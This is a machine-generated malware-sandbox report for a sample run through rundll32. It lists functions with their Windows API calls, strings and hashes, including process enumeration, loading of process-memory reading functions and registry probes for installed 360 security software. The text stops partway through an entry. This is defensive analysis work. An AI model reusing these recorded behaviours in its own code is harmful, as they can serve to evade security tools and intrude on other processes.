Instruction Fuzzy Hash: 78413772705648C6EBA68F21E004B9E7BB1F348BC8FA4C115EE4947B89CB7EC649C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8533AC Relevance: 9.2, APIs: 6, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
Instruction ID: 5561057c3e60ea947afe761e99cd86dc7beda32c5bf69ff1cca539d4e8ef706e
Opcode Fuzzy Hash: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
Instruction Fuzzy Hash: C891EE3A22DB8595EA60DB10E6D03DAB3A1F7D5384FA09065A78D436E9DFBCC645CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC853A24 Relevance: 9.1, APIs: 6, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00000187EC853A6D

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
Instruction ID: bc0aef6d8b3442bf090ca0af247fd3fa792dc509d68d26507bf9c47ecf274583
Opcode Fuzzy Hash: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
Instruction Fuzzy Hash: 6751413921CA8082EB60DB14F59039AB760F3D57A4F208255EBE947BE8DFBDC545CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC853868 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
Instruction ID: 699dc6b325462ff036af16ca99e5aae96d21516a4923076e8da4712dcbf75698
Opcode Fuzzy Hash: c40ee5ec7f747c4b479e98bcd982703e9207b45c7ee94fbb0c95756ed98e132e
Instruction Fuzzy Hash: 5D413E7D13CA0086FA615B24A7C43E97290BBE5368F30C7A5E66A867D5DFBCC7048B05

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC858820 Relevance: 6.0, APIs: 4, Instructions: 28
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000187EC858836
Process32FirstW.KERNEL32 ref: 00000187EC858862
Process32NextW.KERNEL32 ref: 00000187EC858880
CloseHandle.KERNEL32 ref: 00000187EC85888F

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction ID: b0eebd9344f9d14e114861c4f6abb2cda0a420a09291eff156a245af8214c2e3
Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction Fuzzy Hash: 74016D36628A40C3E7A0CB21E88875AB360F7C8748F548251A68E866A8DF7CC605CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000001800701F6
VirtualAlloc.KERNELBASE ref: 000000018007026A

Strings

S5Xl, xrefs: 0000000180070240

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: S5Xl
API String ID: 4275171209-3963265540
Opcode ID: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
Instruction ID: 8627bea6adcabeb617a02013d3036f8ce64dc83beb87997f1cd45eda72222d63
Opcode Fuzzy Hash: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
Instruction Fuzzy Hash: B63146733116A886CB56CF75A548FEC3BAAF718BC8F5281268E4D07B55DE39C11AC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85B400 Relevance: 4.5, APIs: 3, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00000187EC85B498
CloseHandle.KERNEL32 ref: 00000187EC85B4AB
CloseHandle.KERNEL32 ref: 00000187EC85B4B6

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID:
API String ID: 2922976086-0
Opcode ID: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
Instruction ID: e35d85ea1b11c937b8a6d109d50f9dd61194c3801e7f73a967593f4225e91ce8
Opcode Fuzzy Hash: cd309ebfe44d1ce1b9eebeab880966758d8a8f2593ff83e7c251b015e6764e6d
Instruction Fuzzy Hash: FE11FB3662C680C7E7A0CB64F5847ABB7A0F3C4354F608525E78982AA8DFBCC558CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8589D4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

FindFirstVolumeW.KERNEL32 ref: 00000187EC858A0E
GetVolumeInformationW.KERNEL32 ref: 00000187EC858A62
FindVolumeClose.KERNEL32 ref: 00000187EC858A71

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Volume$Find$CloseFirstInformation
String ID:
API String ID: 586543143-0
Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction ID: ccd6743acc604b587464a451f547b7f142fc1a729cfa3022508812696f346d91
Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction Fuzzy Hash: 3E11BC39228B40D6E7619B10F5C43DA73A1F3C4350FA44266E3A942AE8DF7CC659CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC853C2C Relevance: 4.5, APIs: 3, Instructions: 15synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32 ref: 00000187EC853C49
ReleaseMutex.KERNEL32 ref: 00000187EC853C60
CloseHandle.KERNEL32 ref: 00000187EC853C6D

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseEventHandleMutexRelease
String ID:
API String ID: 3391745777-0
Opcode ID: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
Instruction ID: 5ea527424c0cb6276245d8d55839c97b3432fc1bb6a8d933166c011bc9ae5710
Opcode Fuzzy Hash: 34ec866cfd7482a0b3d3af7380d3e699ee32a18233fddf405b1384eaf4aff779
Instruction Fuzzy Hash: 40F0527C52CA40C2E6A49B14EAC83953361F7D574DF608195D96E822F0CFBCCA89CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000000018007026A

Strings

S5Xl, xrefs: 0000000180070240

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: S5Xl
API String ID: 4275171209-3963265540
Opcode ID: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
Instruction ID: cfc6a34ce132622bae8ceb4dc72cd21c5819cecda536a8dbeac765b14806de91
Opcode Fuzzy Hash: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
Instruction Fuzzy Hash: 691106723217A885CE61CF35A54CFA82BA9F71CFC8F1691158E4D13B01DE39C019C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8588F8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

RtlFormatCurrentUserKeyPath.NTDLL ref: 00000187EC85896F

Part of subcall function 00000187EC857B40: NtFreeVirtualMemory.NTDLL ref: 00000187EC857B71

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: CurrentFormatFreeMemoryPathUserVirtual
String ID:
API String ID: 2593304397-0
Opcode ID: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
Instruction ID: 2300dc74dcba8a5ddffae9d15f134fbd22246b625046c6e814af97623a5e3da6
Opcode Fuzzy Hash: f52ee2aa33d777d70af5112c0a56f381be43764fb5e061da45e694194d02d43a
Instruction Fuzzy Hash: B621157A23C68191FA709B11F6D13EA7361F7D4384FA08566A7CD826E9EF6CD7048701

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC857414 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00000187EC857428

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
Instruction ID: 558d596070ad8857fbd1b652c6d6cfc9089419d453dacb07c692df32a5b8f1f8
Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
Instruction Fuzzy Hash: 4FE0123963CA81C6E7A09B34E9817AB6A50F3C1350F60D660ABE6816D4DF6CC5559B01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701E0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000001800701F6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
Instruction ID: fdd3b53fd5ef90cd25e79b7e67ac9ef4d4291e3d36f58b03b6eae1744e84b5e2
Opcode Fuzzy Hash: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
Instruction Fuzzy Hash: 42C01262B0D6D049D7056B7420A469E2FB16762789B05405A4B4163E69C8388206C704

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000000018004A650 Relevance: 79.3, APIs: 37, Strings: 8, Instructions: 513filesleepmemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004A762
GetModuleFileNameW.KERNEL32 ref: 000000018004A778
PathAppendW.SHLWAPI ref: 000000018004A79A
ShellExecuteExW.SHELL32 ref: 000000018004A7D9
ILGetSize.SHELL32 ref: 000000018004A879
GetTickCount.KERNEL32 ref: 000000018004A8A3
srand.MSVCRT ref: 000000018004A8AB
GetCurrentProcess.KERNEL32 ref: 000000018004A8C4
GetProcessId.KERNEL32 ref: 000000018004A8CD
GetCurrentThreadId.KERNEL32 ref: 000000018004A8FF
rand.MSVCRT ref: 000000018004A907
LocalAlloc.KERNEL32 ref: 000000018004A956
InitializeSecurityDescriptor.ADVAPI32 ref: 000000018004A96C
LocalFree.KERNEL32 ref: 000000018004A979
SetSecurityDescriptorDacl.ADVAPI32 ref: 000000018004A9D6
CreateFileMappingW.KERNEL32 ref: 000000018004AA10
LocalFree.KERNEL32 ref: 000000018004AA1E
CreateFileMappingW.KERNEL32 ref: 000000018004AA59
MapViewOfFile.KERNEL32 ref: 000000018004AA84
CloseHandle.KERNEL32 ref: 000000018004AA97
memset.MSVCRT ref: 000000018004AAAC
memmove.MSVCRT ref: 000000018004AB4C
memmove.MSVCRT ref: 000000018004AB67
memmove.MSVCRT ref: 000000018004ABB3
memmove.MSVCRT ref: 000000018004ABCC
memmove.MSVCRT ref: 000000018004AC8F
UnmapViewOfFile.KERNEL32 ref: 000000018004ACA8
FindWindowW.USER32 ref: 000000018004ACC1
SetForegroundWindow.USER32 ref: 000000018004ACCF
memset.MSVCRT ref: 000000018004ACE4
wsprintfW.USER32 ref: 000000018004AD17
memset.MSVCRT ref: 000000018004AD2E
WaitForSingleObject.KERNEL32 ref: 000000018004AE1F
Sleep.KERNEL32 ref: 000000018004AE34
CloseHandle.KERNEL32 ref: 000000018004AE4C
CloseHandle.KERNEL32 ref: 000000018004AE5B
CloseHandle.KERNEL32 ref: 000000018004AE66

Strings

/%s %s %u, xrefs: 000000018004ACF1
Progman, xrefs: 000000018004ACBA
open, xrefs: 000000018004A654
se1, xrefs: 000000018004AD10
%u_%d_%d_%d_%u, xrefs: 000000018004A92D
..\360DeskAna64.exe, xrefs: 000000018004A78C
Program manager, xrefs: 000000018004ACB3
se2, xrefs: 000000018004AD07

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Filememmove$CloseHandlememset$Local$CreateCurrentDescriptorFreeMappingProcessSecurityViewWindow$AllocAppendCountDaclExecuteFindForegroundInitializeModuleNameObjectPathShellSingleSizeSleepThreadTickUnmapWaitrandsrandwsprintf
String ID: %u_%d_%d_%d_%u$..\360DeskAna64.exe$/%s %s %u$Progman$Program manager$open$se1$se2
API String ID: 1121195023-828389715
Opcode ID: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
Instruction ID: 9c018b3ec5208d5dc303fe800ce77a7618bf785d2afa65f14d01c037d361c4e0
Opcode Fuzzy Hash: bf27cba7947237ddb48d80a7ebe4eca32a8cf6ef406abc02a9deeb192b889f14
Instruction Fuzzy Hash: D332CC72604B8886FB96CF25D8803DD73B1F789BD8F528116EA5947BA4DF38C649C708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010580 Relevance: 61.5, APIs: 25, Strings: 10, Instructions: 237registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800105C6
GetModuleFileNameW.KERNEL32 ref: 00000001800105DD
memset.MSVCRT ref: 00000001800105EF
RegOpenKeyExW.ADVAPI32 ref: 000000018001061C
RegQueryValueExW.ADVAPI32 ref: 0000000180010660
RegCloseKey.ADVAPI32 ref: 000000018001066B
PathAddBackslashW.SHLWAPI ref: 0000000180010684
StrCmpNIW.SHLWAPI ref: 00000001800106C8
memset.MSVCRT ref: 00000001800106E0
PathFileExistsW.SHLWAPI ref: 000000018001071C
memset.MSVCRT ref: 0000000180010734
PathFileExistsW.SHLWAPI ref: 0000000180010769
memset.MSVCRT ref: 000000018001077B
PathFileExistsW.SHLWAPI ref: 00000001800107AC

Strings

360SkinMgr.exe, xrefs: 0000000180010916
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe, xrefs: 0000000180010896
360leakfixer.exe, xrefs: 00000001800106E5
safemon\360Cactus.tpi, xrefs: 0000000180010834
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 000000018001060B
safemon\pedrver.dll, xrefs: 0000000180010739
Path, xrefs: 0000000180010655, 00000001800108D7
hipsver.dll, xrefs: 00000001800107E7
%s\%s, xrefs: 00000001800106EF
safemon\FreeSaaS.tpi, xrefs: 0000000180010780

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memset$FilePath$Exists$BackslashCloseModuleNameOpenQueryValue
String ID: %s\%s$360SkinMgr.exe$360leakfixer.exe$Path$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360sd.exe$hipsver.dll$safemon\360Cactus.tpi$safemon\FreeSaaS.tpi$safemon\pedrver.dll
API String ID: 4260417939-4002867936
Opcode ID: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
Instruction ID: bf4960b57fd98bc25e9fd953caee1d48b1d668c6bea79cfa729634ea3028d897
Opcode Fuzzy Hash: 69930986b2b6c6c437e187827024c0865ac4d7e0e25485b3d46344904dffa666
Instruction Fuzzy Hash: BCB13D31614E8895EBA2DB21EC543DA63A4F78DBC4F908116FA9D87A95EF39C70DC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001ECF4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 323fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018001ED67
GetFileSizeEx.KERNEL32 ref: 000000018001ED80
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001EDA6
ReadFile.KERNEL32 ref: 000000018001EDCE
CloseHandle.KERNEL32 ref: 000000018001EDDD
SetFilePointer.KERNEL32 ref: 000000018001EE03
ReadFile.KERNEL32 ref: 000000018001EE20
SetFilePointer.KERNEL32 ref: 000000018001EE63
ReadFile.KERNEL32 ref: 000000018001EE80
SetFilePointer.KERNEL32 ref: 000000018001EF14
ReadFile.KERNEL32 ref: 000000018001EF31
SetFilePointer.KERNEL32 ref: 000000018001EFB0
ReadFile.KERNEL32 ref: 000000018001EFCD
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001F007
MultiByteToWideChar.KERNEL32 ref: 000000018001F034

Part of subcall function 0000000180036EC8: wcschr.MSVCRT ref: 0000000180036F7A
Part of subcall function 0000000180036EC8: _wcslwr.MSVCRT ref: 0000000180036FC8

SetFilePointer.KERNEL32 ref: 000000018001F064
ReadFile.KERNEL32 ref: 000000018001F07D
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001F0A6
memmove.MSVCRT ref: 000000018001F0C1
memmove.MSVCRT ref: 000000018001F0EE
memmove.MSVCRT ref: 000000018001F117
??3@YAXPEAX@Z.MSVCRT ref: 000000018001F172
CloseHandle.KERNEL32 ref: 000000018001F17E
??3@YAXPEAX@Z.MSVCRT ref: 000000018001F195
CloseHandle.KERNEL32 ref: 000000018001F1A5

Strings

9, xrefs: 000000018001EF82

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: File$Read$Pointer$CloseHandlememmove$??3@$ByteCharCreateMultiSizeWide_wcslwrwcschr
String ID: 9
API String ID: 2469906296-2366072709
Opcode ID: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
Instruction ID: b16b18eef39a39b515becb99aaa5640e1c6952976385d86e077c0efac659451c
Opcode Fuzzy Hash: 1edc00ec3368a205bebbe676ef1486fb611a75b6483dacecd85243c6051295a2
Instruction Fuzzy Hash: 43D1D072300A8886EBA6DF25E8507ED37A1F749BD8F448614FE5647BA8DF38C249C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062148 Relevance: 43.9, APIs: 14, Strings: 11, Instructions: 114libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006217C
GetModuleFileNameW.KERNEL32 ref: 0000000180062193
PathCombineW.SHLWAPI ref: 00000001800621AA

Part of subcall function 0000000180065F9C: GetModuleHandleW.KERNEL32 ref: 0000000180065FBE
Part of subcall function 0000000180065F9C: memset.MSVCRT ref: 0000000180065FD4

GetProcAddress.KERNEL32 ref: 00000001800621DB
GetProcAddress.KERNEL32 ref: 00000001800621EF
GetProcAddress.KERNEL32 ref: 0000000180062203
GetProcAddress.KERNEL32 ref: 0000000180062217
GetProcAddress.KERNEL32 ref: 000000018006222B
GetProcAddress.KERNEL32 ref: 000000018006223F
GetProcAddress.KERNEL32 ref: 0000000180062253
GetProcAddress.KERNEL32 ref: 0000000180062267
GetProcAddress.KERNEL32 ref: 000000018006227B
GetProcAddress.KERNEL32 ref: 000000018006228F
FreeLibrary.KERNEL32 ref: 00000001800622DD

Strings

NtQueryInformationThread64, xrefs: 000000018006226D
GetModuleBaseNameW64, xrefs: 00000001800621E1
..\ipc\x64for32lib.dll, xrefs: 0000000180062199
EnumProcessModules64, xrefs: 0000000180062209
GetModuleFileNameExW64, xrefs: 00000001800621F5
GetCurrentDirectory64, xrefs: 0000000180062231
GetCommandLine64, xrefs: 000000018006221D
GetModuleInformation64, xrefs: 0000000180062259
ReadProcessMemory64, xrefs: 00000001800621D1
IsProcessWow64Process, xrefs: 0000000180062245
NtQueryInformationProcess64, xrefs: 0000000180062281

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
API String ID: 3359005274-2277939915
Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002610 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 416registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180002691
memset.MSVCRT ref: 00000001800026A3
memset.MSVCRT ref: 00000001800026C1
memset.MSVCRT ref: 000000018000275C
memset.MSVCRT ref: 0000000180002771
RegOpenKeyExW.ADVAPI32 ref: 0000000180002824
RegEnumKeyW.ADVAPI32 ref: 000000018000286C
RegOpenKeyExW.ADVAPI32 ref: 0000000180002964
free.MSVCRT ref: 0000000180002A97
RegCloseKey.ADVAPI32 ref: 0000000180002AD2
RegCloseKey.ADVAPI32 ref: 0000000180002AFB
RegCloseKey.ADVAPI32 ref: 0000000180002D4B

Strings

HKEY_LOCAL_MACHINE\, xrefs: 0000000180002CA7
\Products\, xrefs: 00000001800028DF
\Components\, xrefs: 0000000180002BB2
\Features\, xrefs: 000000018000290E

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memset$Close$Open$Enumfree
String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
API String ID: 1285027818-2258373985
Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
